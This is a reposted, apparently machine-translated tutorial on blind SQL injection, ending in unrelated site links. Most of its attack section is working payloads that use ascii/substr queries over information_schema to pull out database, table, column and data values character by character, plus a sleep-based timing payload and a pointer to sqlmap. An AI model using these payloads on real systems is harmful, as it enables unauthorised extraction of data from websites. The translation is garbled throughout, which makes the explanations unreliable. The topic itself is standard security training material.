SQL injection: Blinds

Others 2019-11-20 15:29:56 views: null

Blind Profile

The so-called blinds is when the server is not wrong echo of the finished injection attacks.
No echo server error, for an attacker missing a very important "debugging information."

Blind Category

1. Boolean blind
Boolean Obviously Ture and Fales, which means it will inject according to your information returns True and Fales, there will be no error message before.

2. Time blinds
interface return only one value, True. And regardless of the input value, the situation will return to normal processing. Adding a specific function of time, the time difference by looking at the web page to return to judge the injected statement is correct.

Blinds need to know the function

length () function returns the length of the string
substr () taken string (syntax: the SUBSTR (STR, POS, len);)
ascii () returns the character ascii code [character into a digital Wei]
SLEEP () will be linked to the program from n to n seconds period
if (expr1, expr2, expr3) determines if an error statement second statement third statement executed if the first statement is executed correctly

Implantation step

1. guess database name length
id = 1'and (length (database ( )))> n

2. Guess the stops library name
and (ascii (substr (database ( ), 1,1))) = 115 - + return to normal, indicating that the database name of the first one is s

3. guess table
and (ascii (substr ((select table_name from information_schema.tables where table_schema = database () limit 0,1), 1,1))) = 101 - + return to normal, indicating the name of the database table the first one is e

4. guess field name
and (ascii (substr ((select column_name from information_schema.columns where table_name = 'zkaq' limit 0,1), 1,1))) = 102 - + return to normal, described in the table columns zkaq The first name is f

5. guessed data
and (ascii (substr ((select zKaQ from zkaq limit 4,1), 1,1))) = 122 - + return to normal, a first column is described zKaQ z

Use tools

sqlmap Tools

Download: https://github.com/sqlmapproject/sqlmap
Once you have downloaded directly extract, and adding environment variables, you can directly call the cmd

Can also be used kali comes sqlmap

Delay Injection Methods

and if (ascii (substr (database (), 1,1))> 120,0, sleep (10)) - +
The statement said that if the page is loaded and then correct the 10s

Guess you like

Origin www.cnblogs.com/yanlzy/p/11884302.html
Recommended
TIOBE May list: Fortran “resurrected” into Top 10
GCC 14.1 released
Ranking
B. Little Girl and Game【1300 / 回文字符串 博弈论】
CIKERS Shane 20190613
"Javascript advanced programming" study notes - the constructor and prototype
beeline hiveserver2 start
springboot - Automatically backup mysql data every day
Data Storage Full Solution--Detailed Persistence Technology
Detailed Explanation of Spring Web MVC DispatcherServlet—Official Original
TCP / IP protocol layers structure and function
Command type literal pos: unknown; Fallback type literal pos: unknown] with root cause
Design of multifunctional curtain controller with indoor anti-theft alarm
Daily
More
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)

Code World

© 2018 codetd.com